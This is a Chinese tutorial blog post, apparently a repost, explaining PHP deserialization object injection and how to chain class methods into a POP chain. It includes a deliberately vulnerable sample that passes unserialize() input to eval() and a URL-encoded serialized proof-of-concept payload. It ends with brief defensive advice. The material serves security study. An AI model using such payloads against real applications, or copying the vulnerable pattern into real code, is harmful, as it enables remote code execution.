php对象注入-pop链的构造

最新推荐文章于 2024-04-24 17:20:18 发布
最新推荐文章于 2024-04-24 17:20:18 发布
阅读量280 收藏 2
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/iamstudy/articles/php_object_injection_pop_chain.html
版权
前言

反序列化可以控制类属性,无论是private还是public

<?php
class A {
    private $a = "a";
    public $b = "b";
    static $c = "c";
}
$test = new A();
echo urlencode(serialize($test));

O%3A1%3A%22A%22%3A2%3A%7Bs%3A4%3A%22%00A%00a%22%3Bs%3A1%3A%22a%22%3Bs%3A1%3A%22b%22%3Bs%3A1%3A%22b%22%3B%7D

804631-20161107110119655-1275504383.jpg

其中有个%00存在是因为private属性。

pop链的利用

以前理解的序列化攻击更多的是在魔术方法中出现一些利用的漏洞,因为自动调用从而触发漏洞。
但如果关键代码不在魔术方法中,而是在一个类的普通方法中。这时候可以通过寻找相同的函数名将类的属性和敏感函数的属性联系起来。

<?php
class lemon {
    protected $ClassObj;

    function __construct() {
        $this->ClassObj = new normal();
    }

    function __destruct() {
        $this->ClassObj->action();
    }
}

class normal {
    function action() {
        echo "hello";
    }
}

class evil {
    private $data;
    function action() {
        eval($this->data);
    }
}

unserialize($_GET['d']);

lemon这个类本来是调用,normal类的,但是现在action方法在evil类里面也有,所以可以构造pop链,调用evil类中的action方法。

<?php
class lemon {
    protected $ClassObj;
    function __construct() {
        $this->ClassObj = new evil();
    }
}
class evil {
    private $data = "phpinfo();";
}
echo urlencode(serialize(new lemon()));
echo "\n\r";

注意的是,protected $ClassObj = new evil();是不行的,还是通过__construct来实例化。
生成poc:

O%3A5%3A%22lemon%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00data%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D%7D

804631-20161107110151545-366534869.jpg

获取已经包含的文件:
get_included_files()
获取已经定义的类:
get_declared_classes()
加载所有类
__autoload()

Joomla远程代码执行漏洞分析

p师傅已经很详细的进行一个说明,只是小小的总结一下,与上面相比,是lemon类直接性的new了一个对象,实际中可以在魔术方法中多找一些回调函数之类的,比如call_user_func_array,这样就可以去实例化任意加载的对象,当然如果没有加载的话,那就去想办法利用import一下类。

https://www.leavesongs.com/PENETRATION/joomla-unserialize-code-execute-vulnerability.html

挖掘与防护

serialize/unserialize函数的搜索
用json_encode/json_decode

转载于:https://www.cnblogs.com/iamstudy/articles/php_object_injection_pop_chain.html

dengzhasong7076
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP-Programs
03-26
3. **数组操作**:PHP支持索引数组和关联数组,常用数组函数有`count()`计算元素个数,`array_push()`向数组末尾添加元素,`array_pop()`移除末尾元素,`array_keys()`返回所有键名,`array_values()`返回所有值。...
Starter-php
03-28
你可以定义类,创建对象,使用`__construct`构造函数初始化,通过`extends`关键字实现继承,用`public`、`private`、`protected`控制访问权限,以及利用`interface`和`abstract class`实现接口和抽象类。 ### 错误...
php反序列化绕过,【技术分享】PHP反序列化漏洞
weixin_36239768的博客
03-19 455
前言序列化给我们传递对象提供了一种简单的方法serialize()将一个对象转换成一个字符串unserialize()将字符串还原为一个对象。此类函数的使用本身没有危害,但是传入反序列化函数的字符串用户可控的时候就会存在漏洞——PHP对象注入正文POP序列化的关键在于能够在目标代码当中找到一条可以控制的POPPOP就是class A调用了class B的方法,class B还调用了其他方法...
php反序列漏洞 实例_深入浅析PHP的session反序列化漏洞问题
weixin_34101577的博客
03-09 153
php.ini中存在三项配置项:session.save_path="" --设置session的存储路径session.save_handler="" --设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)session.auto_start boolen --指定会话模块是否在请求开始时启动一个会话,默认为0不启动session.serializ...
php反序列化学习(中)--pop构造
最新发布
qq_75120258的博客
04-24 840
打开环境,进行代码审计这一题我们需要构造pop,既然要构造pop,我们就要找到头和尾(从尾在到头,一步一步的看,这样就思路清晰了)我们先去找尾,我们需要通过这个file_get_contents()函数来获得flag。
PHP反序列化漏洞之产生原因(题目练习)
qq_60463414的博客
08-13 3049
PHP反序列化漏洞之简单的题目练习
php代码审计_渗透测试代码审计之PHP反序列化攻击漏洞讲解
weixin_39604280的博客
11-27 159
PHP反序列化防御serialize()和unserialize()说到反序列化就要先说序列化,反序列化和序列化都伪造着两个函数来弄。serialize()是用于将类转换为一个字符串unserialize()用于将字符串转换回一个类连载()<?php class test{ var $test='123'; } $class1=new test; $class_ser=seriali...
PHP反序列化&魔术方法
weixin_54882883的博客
06-17 904
php反序列化
curso-em-video-php
02-16
8. **面向对象编程(OOP)**:掌握PHP的类和对象概念,包括属性、方法、构造函数、析构函数、封装、继承、多态等。 9. **PHP框架介绍**:可能会涉及一些流行的PHP框架,如Laravel、Symfony或CodeIgniter,介绍它们...
web-spk:PHP样本
03-06
- `__construct()` 构造函数,在创建对象时自动调用。 - `public`, `private`, `protected` 定义成员的访问权限。 - `extends` 实现类的继承。 - `implements` 类实现接口。 - `__get()` 和 `__set()` 用于动态设置...
php-interviews:PHP 面试题与解答
05-12
5. **面向对象编程**:理解类和对象的概念,掌握类的属性、方法、构造函数、析构函数,以及继承、封装和多态的原理。 6. **PHP魔术方法**:了解__construct、__destruct、__get、__set、__call等魔术方法的作用和...
ctf php沙箱,详谈CTF中常出现的PHP反序列化漏洞
weixin_39968724的博客
03-16 992
0x01什么是PHP序列化与反序列化PHP序列化是一种把变量或对象以字符串形式转化以方便储存和传输的方法在PHP中,序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。比方来说,我现在有一个类,我需要通过接口进行数据传输,或存储至数据库中以备将来使用,同时又想保持其结构,让接收方接收或数据库读数据时恢复其原来的结构,就需要通过序列化将对象按照一定格式转化为字符串的形式来进行传输简单...
php反序列化
魔仙棒棒之主的博客
11-05 369
php反序列化
php中的pop构造
blackguest07的博客
03-02 1376
php中反序列化漏洞的原理,pop构造
php反序列化漏洞之pop
weixin_60719780的博客
02-08 1843
常用于上层语言构造特定调用的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用,最终达到攻击者邪恶的目的。类似于PWN中的ROP,有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的 " gadget " 找到漏洞点。把魔术方法作为最开始的小组件,然后在魔术方法中调用其他函数(小组件),通过寻找相同名字的函数,再与
一道php反序列化题的pop构造
good good study
05-19 1037
题目代码如下,其中像套娃一样,多次对魔术方法进行调用,挺烧脑。根据题目,显然目标是echo $flag。最后提交反序列化字符串,获取flag。最后我们用代码实现pop构造。然后访问,输出反序列化字符串。需要把var改为私有属性。倒退分析后,接着正推。
php反序列化之pop构造
weixin_72667582的博客
07-12 306
原题如下。
PHP反序列化--pop
2302_79800344的博客
03-18 1263
pop知识是PHP反序列化模块不可或缺的组成部分
帮我写一个pop构造
05-05
它的基本思路是:通过构造一条ROP,将栈中的返回地址覆盖成pop指令的地址,从而将攻击者控制的地址弹出栈顶,进而实现任意代码执行。 下面是一个简单的pop构造示例,假设目标程序存在一个栈溢出漏洞,攻击者想...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值